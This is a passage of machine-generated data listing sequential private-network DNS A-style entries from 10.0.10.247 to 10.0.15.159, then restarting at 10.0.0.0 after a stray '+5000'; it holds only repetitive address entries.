10.0.10.247 + A 10.0.10.248 + A 10.0.10.249 + A 10.0.10.250 + A 10.0.10.251 + A 
10.0.10.252 + A 10.0.10.253 + A 10.0.10.254 + A 10.0.10.255 + A 10.0.11.0 + A 10.0.11.1 + A 10.0.11.2 + A 10.0.11.3 + A 10.0.11.4 + A 10.0.11.5 + A 10.0.11.6 + A 10.0.11.7 + A 10.0.11.8 + A 10.0.11.9 + A 10.0.11.10 + A 10.0.11.11 + A 10.0.11.12 + A 10.0.11.13 + A 10.0.11.14 + A 10.0.11.15 + A 10.0.11.16 + A 10.0.11.17 + A 10.0.11.18 + A 10.0.11.19 + A 10.0.11.20 + A 10.0.11.21 + A 10.0.11.22 + A 10.0.11.23 + A 10.0.11.24 + A 10.0.11.25 + A 10.0.11.26 + A 10.0.11.27 + A 10.0.11.28 + A 10.0.11.29 + A 10.0.11.30 + A 10.0.11.31 + A 10.0.11.32 + A 10.0.11.33 + A 10.0.11.34 + A 10.0.11.35 + A 10.0.11.36 + A 10.0.11.37 + A 10.0.11.38 + A 10.0.11.39 + A 10.0.11.40 + A 10.0.11.41 + A 10.0.11.42 + A 10.0.11.43 + A 10.0.11.44 + A 10.0.11.45 + A 10.0.11.46 + A 10.0.11.47 + A 10.0.11.48 + A 10.0.11.49 + A 10.0.11.50 + A 10.0.11.51 + A 10.0.11.52 + A 10.0.11.53 + A 10.0.11.54 + A 10.0.11.55 + A 10.0.11.56 + A 10.0.11.57 + A 10.0.11.58 + A 10.0.11.59 + A 10.0.11.60 + A 10.0.11.61 + A 10.0.11.62 + A 10.0.11.63 + A 10.0.11.64 + A 10.0.11.65 + A 10.0.11.66 + A 10.0.11.67 + A 10.0.11.68 + A 10.0.11.69 + A 10.0.11.70 + A 10.0.11.71 + A 10.0.11.72 + A 10.0.11.73 + A 10.0.11.74 + A 10.0.11.75 + A 10.0.11.76 + A 10.0.11.77 + A 10.0.11.78 + A 10.0.11.79 + A 10.0.11.80 + A 10.0.11.81 + A 10.0.11.82 + A 10.0.11.83 + A 10.0.11.84 + A 10.0.11.85 + A 10.0.11.86 + A 10.0.11.87 + A 10.0.11.88 + A 10.0.11.89 + A 10.0.11.90 + A 10.0.11.91 + A 10.0.11.92 + A 10.0.11.93 + A 10.0.11.94 + A 10.0.11.95 + A 10.0.11.96 + A 10.0.11.97 + A 10.0.11.98 + A 10.0.11.99 + A 10.0.11.100 + A 10.0.11.101 + A 10.0.11.102 + A 10.0.11.103 + A 10.0.11.104 + A 10.0.11.105 + A 10.0.11.106 + A 10.0.11.107 + A 10.0.11.108 + A 10.0.11.109 + A 10.0.11.110 + A 10.0.11.111 + A 10.0.11.112 + A 10.0.11.113 + A 10.0.11.114 + A 10.0.11.115 + A 10.0.11.116 + A 10.0.11.117 + A 10.0.11.118 + A 10.0.11.119 + A 10.0.11.120 + A 10.0.11.121 + A 10.0.11.122 + A 10.0.11.123 + A 10.0.11.124 + A 10.0.11.125 + A 10.0.11.126 + A 10.0.11.127 + 
A 10.0.11.128 + A 10.0.11.129 + A 10.0.11.130 + A 10.0.11.131 + A 10.0.11.132 + A 10.0.11.133 + A 10.0.11.134 + A 10.0.11.135 + A 10.0.11.136 + A 10.0.11.137 + A 10.0.11.138 + A 10.0.11.139 + A 10.0.11.140 + A 10.0.11.141 + A 10.0.11.142 + A 10.0.11.143 + A 10.0.11.144 + A 10.0.11.145 + A 10.0.11.146 + A 10.0.11.147 + A 10.0.11.148 + A 10.0.11.149 + A 10.0.11.150 + A 10.0.11.151 + A 10.0.11.152 + A 10.0.11.153 + A 10.0.11.154 + A 10.0.11.155 + A 10.0.11.156 + A 10.0.11.157 + A 10.0.11.158 + A 10.0.11.159 + A 10.0.11.160 + A 10.0.11.161 + A 10.0.11.162 + A 10.0.11.163 + A 10.0.11.164 + A 10.0.11.165 + A 10.0.11.166 + A 10.0.11.167 + A 10.0.11.168 + A 10.0.11.169 + A 10.0.11.170 + A 10.0.11.171 + A 10.0.11.172 + A 10.0.11.173 + A 10.0.11.174 + A 10.0.11.175 + A 10.0.11.176 + A 10.0.11.177 + A 10.0.11.178 + A 10.0.11.179 + A 10.0.11.180 + A 10.0.11.181 + A 10.0.11.182 + A 10.0.11.183 + A 10.0.11.184 + A 10.0.11.185 + A 10.0.11.186 + A 10.0.11.187 + A 10.0.11.188 + A 10.0.11.189 + A 10.0.11.190 + A 10.0.11.191 + A 10.0.11.192 + A 10.0.11.193 + A 10.0.11.194 + A 10.0.11.195 + A 10.0.11.196 + A 10.0.11.197 + A 10.0.11.198 + A 10.0.11.199 + A 10.0.11.200 + A 10.0.11.201 + A 10.0.11.202 + A 10.0.11.203 + A 10.0.11.204 + A 10.0.11.205 + A 10.0.11.206 + A 10.0.11.207 + A 10.0.11.208 + A 10.0.11.209 + A 10.0.11.210 + A 10.0.11.211 + A 10.0.11.212 + A 10.0.11.213 + A 10.0.11.214 + A 10.0.11.215 + A 10.0.11.216 + A 10.0.11.217 + A 10.0.11.218 + A 10.0.11.219 + A 10.0.11.220 + A 10.0.11.221 + A 10.0.11.222 + A 10.0.11.223 + A 10.0.11.224 + A 10.0.11.225 + A 10.0.11.226 + A 10.0.11.227 + A 10.0.11.228 + A 10.0.11.229 + A 10.0.11.230 + A 10.0.11.231 + A 10.0.11.232 + A 10.0.11.233 + A 10.0.11.234 + A 10.0.11.235 + A 10.0.11.236 + A 10.0.11.237 + A 10.0.11.238 + A 10.0.11.239 + A 10.0.11.240 + A 10.0.11.241 + A 10.0.11.242 + A 10.0.11.243 + A 10.0.11.244 + A 10.0.11.245 + A 10.0.11.246 + A 10.0.11.247 + A 10.0.11.248 + A 10.0.11.249 + A 10.0.11.250 + A 10.0.11.251 + A 10.0.11.252 + 
A 10.0.11.253 + A 10.0.11.254 + A 10.0.11.255 + A 10.0.12.0 + A 10.0.12.1 + A 10.0.12.2 + A 10.0.12.3 + A 10.0.12.4 + A 10.0.12.5 + A 10.0.12.6 + A 10.0.12.7 + A 10.0.12.8 + A 10.0.12.9 + A 10.0.12.10 + A 10.0.12.11 + A 10.0.12.12 + A 10.0.12.13 + A 10.0.12.14 + A 10.0.12.15 + A 10.0.12.16 + A 10.0.12.17 + A 10.0.12.18 + A 10.0.12.19 + A 10.0.12.20 + A 10.0.12.21 + A 10.0.12.22 + A 10.0.12.23 + A 10.0.12.24 + A 10.0.12.25 + A 10.0.12.26 + A 10.0.12.27 + A 10.0.12.28 + A 10.0.12.29 + A 10.0.12.30 + A 10.0.12.31 + A 10.0.12.32 + A 10.0.12.33 + A 10.0.12.34 + A 10.0.12.35 + A 10.0.12.36 + A 10.0.12.37 + A 10.0.12.38 + A 10.0.12.39 + A 10.0.12.40 + A 10.0.12.41 + A 10.0.12.42 + A 10.0.12.43 + A 10.0.12.44 + A 10.0.12.45 + A 10.0.12.46 + A 10.0.12.47 + A 10.0.12.48 + A 10.0.12.49 + A 10.0.12.50 + A 10.0.12.51 + A 10.0.12.52 + A 10.0.12.53 + A 10.0.12.54 + A 10.0.12.55 + A 10.0.12.56 + A 10.0.12.57 + A 10.0.12.58 + A 10.0.12.59 + A 10.0.12.60 + A 10.0.12.61 + A 10.0.12.62 + A 10.0.12.63 + A 10.0.12.64 + A 10.0.12.65 + A 10.0.12.66 + A 10.0.12.67 + A 10.0.12.68 + A 10.0.12.69 + A 10.0.12.70 + A 10.0.12.71 + A 10.0.12.72 + A 10.0.12.73 + A 10.0.12.74 + A 10.0.12.75 + A 10.0.12.76 + A 10.0.12.77 + A 10.0.12.78 + A 10.0.12.79 + A 10.0.12.80 + A 10.0.12.81 + A 10.0.12.82 + A 10.0.12.83 + A 10.0.12.84 + A 10.0.12.85 + A 10.0.12.86 + A 10.0.12.87 + A 10.0.12.88 + A 10.0.12.89 + A 10.0.12.90 + A 10.0.12.91 + A 10.0.12.92 + A 10.0.12.93 + A 10.0.12.94 + A 10.0.12.95 + A 10.0.12.96 + A 10.0.12.97 + A 10.0.12.98 + A 10.0.12.99 + A 10.0.12.100 + A 10.0.12.101 + A 10.0.12.102 + A 10.0.12.103 + A 10.0.12.104 + A 10.0.12.105 + A 10.0.12.106 + A 10.0.12.107 + A 10.0.12.108 + A 10.0.12.109 + A 10.0.12.110 + A 10.0.12.111 + A 10.0.12.112 + A 10.0.12.113 + A 10.0.12.114 + A 10.0.12.115 + A 10.0.12.116 + A 10.0.12.117 + A 10.0.12.118 + A 10.0.12.119 + A 10.0.12.120 + A 10.0.12.121 + A 10.0.12.122 + A 10.0.12.123 + A 10.0.12.124 + A 10.0.12.125 + A 10.0.12.126 + A 10.0.12.127 + A 10.0.12.128 
+ A 10.0.12.129 + A 10.0.12.130 + A 10.0.12.131 + A 10.0.12.132 + A 10.0.12.133 + A 10.0.12.134 + A 10.0.12.135 + A 10.0.12.136 + A 10.0.12.137 + A 10.0.12.138 + A 10.0.12.139 + A 10.0.12.140 + A 10.0.12.141 + A 10.0.12.142 + A 10.0.12.143 + A 10.0.12.144 + A 10.0.12.145 + A 10.0.12.146 + A 10.0.12.147 + A 10.0.12.148 + A 10.0.12.149 + A 10.0.12.150 + A 10.0.12.151 + A 10.0.12.152 + A 10.0.12.153 + A 10.0.12.154 + A 10.0.12.155 + A 10.0.12.156 + A 10.0.12.157 + A 10.0.12.158 + A 10.0.12.159 + A 10.0.12.160 + A 10.0.12.161 + A 10.0.12.162 + A 10.0.12.163 + A 10.0.12.164 + A 10.0.12.165 + A 10.0.12.166 + A 10.0.12.167 + A 10.0.12.168 + A 10.0.12.169 + A 10.0.12.170 + A 10.0.12.171 + A 10.0.12.172 + A 10.0.12.173 + A 10.0.12.174 + A 10.0.12.175 + A 10.0.12.176 + A 10.0.12.177 + A 10.0.12.178 + A 10.0.12.179 + A 10.0.12.180 + A 10.0.12.181 + A 10.0.12.182 + A 10.0.12.183 + A 10.0.12.184 + A 10.0.12.185 + A 10.0.12.186 + A 10.0.12.187 + A 10.0.12.188 + A 10.0.12.189 + A 10.0.12.190 + A 10.0.12.191 + A 10.0.12.192 + A 10.0.12.193 + A 10.0.12.194 + A 10.0.12.195 + A 10.0.12.196 + A 10.0.12.197 + A 10.0.12.198 + A 10.0.12.199 + A 10.0.12.200 + A 10.0.12.201 + A 10.0.12.202 + A 10.0.12.203 + A 10.0.12.204 + A 10.0.12.205 + A 10.0.12.206 + A 10.0.12.207 + A 10.0.12.208 + A 10.0.12.209 + A 10.0.12.210 + A 10.0.12.211 + A 10.0.12.212 + A 10.0.12.213 + A 10.0.12.214 + A 10.0.12.215 + A 10.0.12.216 + A 10.0.12.217 + A 10.0.12.218 + A 10.0.12.219 + A 10.0.12.220 + A 10.0.12.221 + A 10.0.12.222 + A 10.0.12.223 + A 10.0.12.224 + A 10.0.12.225 + A 10.0.12.226 + A 10.0.12.227 + A 10.0.12.228 + A 10.0.12.229 + A 10.0.12.230 + A 10.0.12.231 + A 10.0.12.232 + A 10.0.12.233 + A 10.0.12.234 + A 10.0.12.235 + A 10.0.12.236 + A 10.0.12.237 + A 10.0.12.238 + A 10.0.12.239 + A 10.0.12.240 + A 10.0.12.241 + A 10.0.12.242 + A 10.0.12.243 + A 10.0.12.244 + A 10.0.12.245 + A 10.0.12.246 + A 10.0.12.247 + A 10.0.12.248 + A 10.0.12.249 + A 10.0.12.250 + A 10.0.12.251 + A 10.0.12.252 + A 10.0.12.253 
+ A 10.0.12.254 + A 10.0.12.255 + A 10.0.13.0 + A 10.0.13.1 + A 10.0.13.2 + A 10.0.13.3 + A 10.0.13.4 + A 10.0.13.5 + A 10.0.13.6 + A 10.0.13.7 + A 10.0.13.8 + A 10.0.13.9 + A 10.0.13.10 + A 10.0.13.11 + A 10.0.13.12 + A 10.0.13.13 + A 10.0.13.14 + A 10.0.13.15 + A 10.0.13.16 + A 10.0.13.17 + A 10.0.13.18 + A 10.0.13.19 + A 10.0.13.20 + A 10.0.13.21 + A 10.0.13.22 + A 10.0.13.23 + A 10.0.13.24 + A 10.0.13.25 + A 10.0.13.26 + A 10.0.13.27 + A 10.0.13.28 + A 10.0.13.29 + A 10.0.13.30 + A 10.0.13.31 + A 10.0.13.32 + A 10.0.13.33 + A 10.0.13.34 + A 10.0.13.35 + A 10.0.13.36 + A 10.0.13.37 + A 10.0.13.38 + A 10.0.13.39 + A 10.0.13.40 + A 10.0.13.41 + A 10.0.13.42 + A 10.0.13.43 + A 10.0.13.44 + A 10.0.13.45 + A 10.0.13.46 + A 10.0.13.47 + A 10.0.13.48 + A 10.0.13.49 + A 10.0.13.50 + A 10.0.13.51 + A 10.0.13.52 + A 10.0.13.53 + A 10.0.13.54 + A 10.0.13.55 + A 10.0.13.56 + A 10.0.13.57 + A 10.0.13.58 + A 10.0.13.59 + A 10.0.13.60 + A 10.0.13.61 + A 10.0.13.62 + A 10.0.13.63 + A 10.0.13.64 + A 10.0.13.65 + A 10.0.13.66 + A 10.0.13.67 + A 10.0.13.68 + A 10.0.13.69 + A 10.0.13.70 + A 10.0.13.71 + A 10.0.13.72 + A 10.0.13.73 + A 10.0.13.74 + A 10.0.13.75 + A 10.0.13.76 + A 10.0.13.77 + A 10.0.13.78 + A 10.0.13.79 + A 10.0.13.80 + A 10.0.13.81 + A 10.0.13.82 + A 10.0.13.83 + A 10.0.13.84 + A 10.0.13.85 + A 10.0.13.86 + A 10.0.13.87 + A 10.0.13.88 + A 10.0.13.89 + A 10.0.13.90 + A 10.0.13.91 + A 10.0.13.92 + A 10.0.13.93 + A 10.0.13.94 + A 10.0.13.95 + A 10.0.13.96 + A 10.0.13.97 + A 10.0.13.98 + A 10.0.13.99 + A 10.0.13.100 + A 10.0.13.101 + A 10.0.13.102 + A 10.0.13.103 + A 10.0.13.104 + A 10.0.13.105 + A 10.0.13.106 + A 10.0.13.107 + A 10.0.13.108 + A 10.0.13.109 + A 10.0.13.110 + A 10.0.13.111 + A 10.0.13.112 + A 10.0.13.113 + A 10.0.13.114 + A 10.0.13.115 + A 10.0.13.116 + A 10.0.13.117 + A 10.0.13.118 + A 10.0.13.119 + A 10.0.13.120 + A 10.0.13.121 + A 10.0.13.122 + A 10.0.13.123 + A 10.0.13.124 + A 10.0.13.125 + A 10.0.13.126 + A 10.0.13.127 + A 10.0.13.128 + A 
10.0.13.129 + A 10.0.13.130 + A 10.0.13.131 + A 10.0.13.132 + A 10.0.13.133 + A 10.0.13.134 + A 10.0.13.135 + A 10.0.13.136 + A 10.0.13.137 + A 10.0.13.138 + A 10.0.13.139 + A 10.0.13.140 + A 10.0.13.141 + A 10.0.13.142 + A 10.0.13.143 + A 10.0.13.144 + A 10.0.13.145 + A 10.0.13.146 + A 10.0.13.147 + A 10.0.13.148 + A 10.0.13.149 + A 10.0.13.150 + A 10.0.13.151 + A 10.0.13.152 + A 10.0.13.153 + A 10.0.13.154 + A 10.0.13.155 + A 10.0.13.156 + A 10.0.13.157 + A 10.0.13.158 + A 10.0.13.159 + A 10.0.13.160 + A 10.0.13.161 + A 10.0.13.162 + A 10.0.13.163 + A 10.0.13.164 + A 10.0.13.165 + A 10.0.13.166 + A 10.0.13.167 + A 10.0.13.168 + A 10.0.13.169 + A 10.0.13.170 + A 10.0.13.171 + A 10.0.13.172 + A 10.0.13.173 + A 10.0.13.174 + A 10.0.13.175 + A 10.0.13.176 + A 10.0.13.177 + A 10.0.13.178 + A 10.0.13.179 + A 10.0.13.180 + A 10.0.13.181 + A 10.0.13.182 + A 10.0.13.183 + A 10.0.13.184 + A 10.0.13.185 + A 10.0.13.186 + A 10.0.13.187 + A 10.0.13.188 + A 10.0.13.189 + A 10.0.13.190 + A 10.0.13.191 + A 10.0.13.192 + A 10.0.13.193 + A 10.0.13.194 + A 10.0.13.195 + A 10.0.13.196 + A 10.0.13.197 + A 10.0.13.198 + A 10.0.13.199 + A 10.0.13.200 + A 10.0.13.201 + A 10.0.13.202 + A 10.0.13.203 + A 10.0.13.204 + A 10.0.13.205 + A 10.0.13.206 + A 10.0.13.207 + A 10.0.13.208 + A 10.0.13.209 + A 10.0.13.210 + A 10.0.13.211 + A 10.0.13.212 + A 10.0.13.213 + A 10.0.13.214 + A 10.0.13.215 + A 10.0.13.216 + A 10.0.13.217 + A 10.0.13.218 + A 10.0.13.219 + A 10.0.13.220 + A 10.0.13.221 + A 10.0.13.222 + A 10.0.13.223 + A 10.0.13.224 + A 10.0.13.225 + A 10.0.13.226 + A 10.0.13.227 + A 10.0.13.228 + A 10.0.13.229 + A 10.0.13.230 + A 10.0.13.231 + A 10.0.13.232 + A 10.0.13.233 + A 10.0.13.234 + A 10.0.13.235 + A 10.0.13.236 + A 10.0.13.237 + A 10.0.13.238 + A 10.0.13.239 + A 10.0.13.240 + A 10.0.13.241 + A 10.0.13.242 + A 10.0.13.243 + A 10.0.13.244 + A 10.0.13.245 + A 10.0.13.246 + A 10.0.13.247 + A 10.0.13.248 + A 10.0.13.249 + A 10.0.13.250 + A 10.0.13.251 + A 10.0.13.252 + A 10.0.13.253 + A 
10.0.13.254 + A 10.0.13.255 + A 10.0.14.0 + A 10.0.14.1 + A 10.0.14.2 + A 10.0.14.3 + A 10.0.14.4 + A 10.0.14.5 + A 10.0.14.6 + A 10.0.14.7 + A 10.0.14.8 + A 10.0.14.9 + A 10.0.14.10 + A 10.0.14.11 + A 10.0.14.12 + A 10.0.14.13 + A 10.0.14.14 + A 10.0.14.15 + A 10.0.14.16 + A 10.0.14.17 + A 10.0.14.18 + A 10.0.14.19 + A 10.0.14.20 + A 10.0.14.21 + A 10.0.14.22 + A 10.0.14.23 + A 10.0.14.24 + A 10.0.14.25 + A 10.0.14.26 + A 10.0.14.27 + A 10.0.14.28 + A 10.0.14.29 + A 10.0.14.30 + A 10.0.14.31 + A 10.0.14.32 + A 10.0.14.33 + A 10.0.14.34 + A 10.0.14.35 + A 10.0.14.36 + A 10.0.14.37 + A 10.0.14.38 + A 10.0.14.39 + A 10.0.14.40 + A 10.0.14.41 + A 10.0.14.42 + A 10.0.14.43 + A 10.0.14.44 + A 10.0.14.45 + A 10.0.14.46 + A 10.0.14.47 + A 10.0.14.48 + A 10.0.14.49 + A 10.0.14.50 + A 10.0.14.51 + A 10.0.14.52 + A 10.0.14.53 + A 10.0.14.54 + A 10.0.14.55 + A 10.0.14.56 + A 10.0.14.57 + A 10.0.14.58 + A 10.0.14.59 + A 10.0.14.60 + A 10.0.14.61 + A 10.0.14.62 + A 10.0.14.63 + A 10.0.14.64 + A 10.0.14.65 + A 10.0.14.66 + A 10.0.14.67 + A 10.0.14.68 + A 10.0.14.69 + A 10.0.14.70 + A 10.0.14.71 + A 10.0.14.72 + A 10.0.14.73 + A 10.0.14.74 + A 10.0.14.75 + A 10.0.14.76 + A 10.0.14.77 + A 10.0.14.78 + A 10.0.14.79 + A 10.0.14.80 + A 10.0.14.81 + A 10.0.14.82 + A 10.0.14.83 + A 10.0.14.84 + A 10.0.14.85 + A 10.0.14.86 + A 10.0.14.87 + A 10.0.14.88 + A 10.0.14.89 + A 10.0.14.90 + A 10.0.14.91 + A 10.0.14.92 + A 10.0.14.93 + A 10.0.14.94 + A 10.0.14.95 + A 10.0.14.96 + A 10.0.14.97 + A 10.0.14.98 + A 10.0.14.99 + A 10.0.14.100 + A 10.0.14.101 + A 10.0.14.102 + A 10.0.14.103 + A 10.0.14.104 + A 10.0.14.105 + A 10.0.14.106 + A 10.0.14.107 + A 10.0.14.108 + A 10.0.14.109 + A 10.0.14.110 + A 10.0.14.111 + A 10.0.14.112 + A 10.0.14.113 + A 10.0.14.114 + A 10.0.14.115 + A 10.0.14.116 + A 10.0.14.117 + A 10.0.14.118 + A 10.0.14.119 + A 10.0.14.120 + A 10.0.14.121 + A 10.0.14.122 + A 10.0.14.123 + A 10.0.14.124 + A 10.0.14.125 + A 10.0.14.126 + A 10.0.14.127 + A 10.0.14.128 + A 10.0.14.129 + 
A 10.0.14.130 + A 10.0.14.131 + A 10.0.14.132 + A 10.0.14.133 + A 10.0.14.134 + A 10.0.14.135 + A 10.0.14.136 + A 10.0.14.137 + A 10.0.14.138 + A 10.0.14.139 + A 10.0.14.140 + A 10.0.14.141 + A 10.0.14.142 + A 10.0.14.143 + A 10.0.14.144 + A 10.0.14.145 + A 10.0.14.146 + A 10.0.14.147 + A 10.0.14.148 + A 10.0.14.149 + A 10.0.14.150 + A 10.0.14.151 + A 10.0.14.152 + A 10.0.14.153 + A 10.0.14.154 + A 10.0.14.155 + A 10.0.14.156 + A 10.0.14.157 + A 10.0.14.158 + A 10.0.14.159 + A 10.0.14.160 + A 10.0.14.161 + A 10.0.14.162 + A 10.0.14.163 + A 10.0.14.164 + A 10.0.14.165 + A 10.0.14.166 + A 10.0.14.167 + A 10.0.14.168 + A 10.0.14.169 + A 10.0.14.170 + A 10.0.14.171 + A 10.0.14.172 + A 10.0.14.173 + A 10.0.14.174 + A 10.0.14.175 + A 10.0.14.176 + A 10.0.14.177 + A 10.0.14.178 + A 10.0.14.179 + A 10.0.14.180 + A 10.0.14.181 + A 10.0.14.182 + A 10.0.14.183 + A 10.0.14.184 + A 10.0.14.185 + A 10.0.14.186 + A 10.0.14.187 + A 10.0.14.188 + A 10.0.14.189 + A 10.0.14.190 + A 10.0.14.191 + A 10.0.14.192 + A 10.0.14.193 + A 10.0.14.194 + A 10.0.14.195 + A 10.0.14.196 + A 10.0.14.197 + A 10.0.14.198 + A 10.0.14.199 + A 10.0.14.200 + A 10.0.14.201 + A 10.0.14.202 + A 10.0.14.203 + A 10.0.14.204 + A 10.0.14.205 + A 10.0.14.206 + A 10.0.14.207 + A 10.0.14.208 + A 10.0.14.209 + A 10.0.14.210 + A 10.0.14.211 + A 10.0.14.212 + A 10.0.14.213 + A 10.0.14.214 + A 10.0.14.215 + A 10.0.14.216 + A 10.0.14.217 + A 10.0.14.218 + A 10.0.14.219 + A 10.0.14.220 + A 10.0.14.221 + A 10.0.14.222 + A 10.0.14.223 + A 10.0.14.224 + A 10.0.14.225 + A 10.0.14.226 + A 10.0.14.227 + A 10.0.14.228 + A 10.0.14.229 + A 10.0.14.230 + A 10.0.14.231 + A 10.0.14.232 + A 10.0.14.233 + A 10.0.14.234 + A 10.0.14.235 + A 10.0.14.236 + A 10.0.14.237 + A 10.0.14.238 + A 10.0.14.239 + A 10.0.14.240 + A 10.0.14.241 + A 10.0.14.242 + A 10.0.14.243 + A 10.0.14.244 + A 10.0.14.245 + A 10.0.14.246 + A 10.0.14.247 + A 10.0.14.248 + A 10.0.14.249 + A 10.0.14.250 + A 10.0.14.251 + A 10.0.14.252 + A 10.0.14.253 + A 10.0.14.254 + 
A 10.0.14.255 + A 10.0.15.0 + A 10.0.15.1 + A 10.0.15.2 + A 10.0.15.3 + A 10.0.15.4 + A 10.0.15.5 + A 10.0.15.6 + A 10.0.15.7 + A 10.0.15.8 + A 10.0.15.9 + A 10.0.15.10 + A 10.0.15.11 + A 10.0.15.12 + A 10.0.15.13 + A 10.0.15.14 + A 10.0.15.15 + A 10.0.15.16 + A 10.0.15.17 + A 10.0.15.18 + A 10.0.15.19 + A 10.0.15.20 + A 10.0.15.21 + A 10.0.15.22 + A 10.0.15.23 + A 10.0.15.24 + A 10.0.15.25 + A 10.0.15.26 + A 10.0.15.27 + A 10.0.15.28 + A 10.0.15.29 + A 10.0.15.30 + A 10.0.15.31 + A 10.0.15.32 + A 10.0.15.33 + A 10.0.15.34 + A 10.0.15.35 + A 10.0.15.36 + A 10.0.15.37 + A 10.0.15.38 + A 10.0.15.39 + A 10.0.15.40 + A 10.0.15.41 + A 10.0.15.42 + A 10.0.15.43 + A 10.0.15.44 + A 10.0.15.45 + A 10.0.15.46 + A 10.0.15.47 + A 10.0.15.48 + A 10.0.15.49 + A 10.0.15.50 + A 10.0.15.51 + A 10.0.15.52 + A 10.0.15.53 + A 10.0.15.54 + A 10.0.15.55 + A 10.0.15.56 + A 10.0.15.57 + A 10.0.15.58 + A 10.0.15.59 + A 10.0.15.60 + A 10.0.15.61 + A 10.0.15.62 + A 10.0.15.63 + A 10.0.15.64 + A 10.0.15.65 + A 10.0.15.66 + A 10.0.15.67 + A 10.0.15.68 + A 10.0.15.69 + A 10.0.15.70 + A 10.0.15.71 + A 10.0.15.72 + A 10.0.15.73 + A 10.0.15.74 + A 10.0.15.75 + A 10.0.15.76 + A 10.0.15.77 + A 10.0.15.78 + A 10.0.15.79 + A 10.0.15.80 + A 10.0.15.81 + A 10.0.15.82 + A 10.0.15.83 + A 10.0.15.84 + A 10.0.15.85 + A 10.0.15.86 + A 10.0.15.87 + A 10.0.15.88 + A 10.0.15.89 + A 10.0.15.90 + A 10.0.15.91 + A 10.0.15.92 + A 10.0.15.93 + A 10.0.15.94 + A 10.0.15.95 + A 10.0.15.96 + A 10.0.15.97 + A 10.0.15.98 + A 10.0.15.99 + A 10.0.15.100 + A 10.0.15.101 + A 10.0.15.102 + A 10.0.15.103 + A 10.0.15.104 + A 10.0.15.105 + A 10.0.15.106 + A 10.0.15.107 + A 10.0.15.108 + A 10.0.15.109 + A 10.0.15.110 + A 10.0.15.111 + A 10.0.15.112 + A 10.0.15.113 + A 10.0.15.114 + A 10.0.15.115 + A 10.0.15.116 + A 10.0.15.117 + A 10.0.15.118 + A 10.0.15.119 + A 10.0.15.120 + A 10.0.15.121 + A 10.0.15.122 + A 10.0.15.123 + A 10.0.15.124 + A 10.0.15.125 + A 10.0.15.126 + A 10.0.15.127 + A 10.0.15.128 + A 10.0.15.129 + A 10.0.15.130 
+ A 10.0.15.131 + A 10.0.15.132 + A 10.0.15.133 + A 10.0.15.134 + A 10.0.15.135 + A 10.0.15.136 + A 10.0.15.137 + A 10.0.15.138 + A 10.0.15.139 + A 10.0.15.140 + A 10.0.15.141 + A 10.0.15.142 + A 10.0.15.143 + A 10.0.15.144 + A 10.0.15.145 + A 10.0.15.146 + A 10.0.15.147 + A 10.0.15.148 + A 10.0.15.149 + A 10.0.15.150 + A 10.0.15.151 + A 10.0.15.152 + A 10.0.15.153 + A 10.0.15.154 + A 10.0.15.155 + A 10.0.15.156 + A 10.0.15.157 + A 10.0.15.158 + A 10.0.15.159 +5000 A 10.0.0.0 + A 10.0.0.1 + A 10.0.0.2 + A 10.0.0.3 + A 10.0.0.4 + A 10.0.0.5 + A 10.0.0.6 + A 10.0.0.7 + A 10.0.0.8 + A 10.0.0.9 + A 10.0.0.10 + A 10.0.0.11 + A 10.0.0.12 + A 10.0.0.13 + A 10.0.0.14 + A 10.0.0.15 + A 10.0.0.16 + A 10.0.0.17 + A 10.0.0.18 + A 10.0.0.19 + A 10.0.0.20 + A 10.0.0.21 + A 10.0.0.22 + A 10.0.0.23 + A 10.0.0.24 + A 10.0.0.25 + A 10.0.0.26 + A 10.0.0.27 + A 10.0.0.28 + A 10.0.0.29 + A 10.0.0.30 + A 10.0.0.31 + A 10.0.0.32 + A 10.0.0.33 + A 10.0.0.34 + A 10.0.0.35 + A 10.0.0.36 + A 10.0.0.37 + A 10.0.0.38 + A 10.0.0.39 + A 10.0.0.40 + A 10.0.0.41 + A 10.0.0.42 + A 10.0.0.43 + A 10.0.0.44 + A 10.0.0.45 + A 10.0.0.46 + A 10.0.0.47 + A 10.0.0.48 + A 10.0.0.49 + A 10.0.0.50 + A 10.0.0.51 + A 10.0.0.52 + A 10.0.0.53 + A 10.0.0.54 + A 10.0.0.55 + A 10.0.0.56 + A 10.0.0.57 + A 10.0.0.58 + A 10.0.0.59 + A 10.0.0.60 + A 10.0.0.61 + A 10.0.0.62 + A 10.0.0.63 + A 10.0.0.64 + A 10.0.0.65 + A 10.0.0.66 + A 10.0.0.67 + A 10.0.0.68 + A 10.0.0.69 + A 10.0.0.70 + A 10.0.0.71 + A 10.0.0.72 + A 10.0.0.73 + A 10.0.0.74 + A 10.0.0.75 + A 10.0.0.76 + A 10.0.0.77 + A 10.0.0.78 + A 10.0.0.79 + A 10.0.0.80 + A 10.0.0.81 + A 10.0.0.82 + A 10.0.0.83 + A 10.0.0.84 + A 10.0.0.85 + A 10.0.0.86 + A 10.0.0.87 + A 10.0.0.88 + A 10.0.0.89 + A 10.0.0.90 + A 10.0.0.91 + A 10.0.0.92 + A 10.0.0.93 + A 10.0.0.94 + A 10.0.0.95 + A 10.0.0.96 + A 10.0.0.97 + A 10.0.0.98 + A 10.0.0.99 + A 10.0.0.100 + A 10.0.0.101 + A 10.0.0.102 + A 10.0.0.103 + A 10.0.0.104 + A 10.0.0.105 + A 10.0.0.106 + A 10.0.0.107 + A 10.0.0.108 + A 
10.0.0.109 + A 10.0.0.110 + A 10.0.0.111 + A 10.0.0.112 + A 10.0.0.113 + A 10.0.0.114 + A 10.0.0.115 + A 10.0.0.116 + A 10.0.0.117 + A 10.0.0.118 + A 10.0.0.119 + A 10.0.0.120 + A 10.0.0.121 + A 10.0.0.122 + A 10.0.0.123 + A 10.0.0.124 + A 10.0.0.125 + A 10.0.0.126 + A 10.0.0.127 + A 10.0.0.128 + A 10.0.0.129 + A 10.0.0.130 + A 10.0.0.131 + A 10.0.0.132 + A 10.0.0.133 + A 10.0.0.134 + A 10.0.0.135 + A 10.0.0.136 + A 10.0.0.137 + A 10.0.0.138 + A 10.0.0.139 + A 10.0.0.140 + A 10.0.0.141 + A 10.0.0.142 + A 10.0.0.143 + A 10.0.0.144 + A 10.0.0.145 + A 10.0.0.146 + A 10.0.0.147 + A 10.0.0.148 + A 10.0.0.149 + A 10.0.0.150 + A 10.0.0.151 + A 10.0.0.152 + A 10.0.0.153 + A 10.0.0.154 + A 10.0.0.155 + A 10.0.0.156 + A 10.0.0.157 + A 10.0.0.158 + A 10.0.0.159 + A 10.0.0.160 + A 10.0.0.161 + A 10.0.0.162 + A 10.0.0.163 + A 10.0.0.164 + A 10.0.0.165 + A 10.0.0.166 + A 10.0.0.167 + A 10.0.0.168 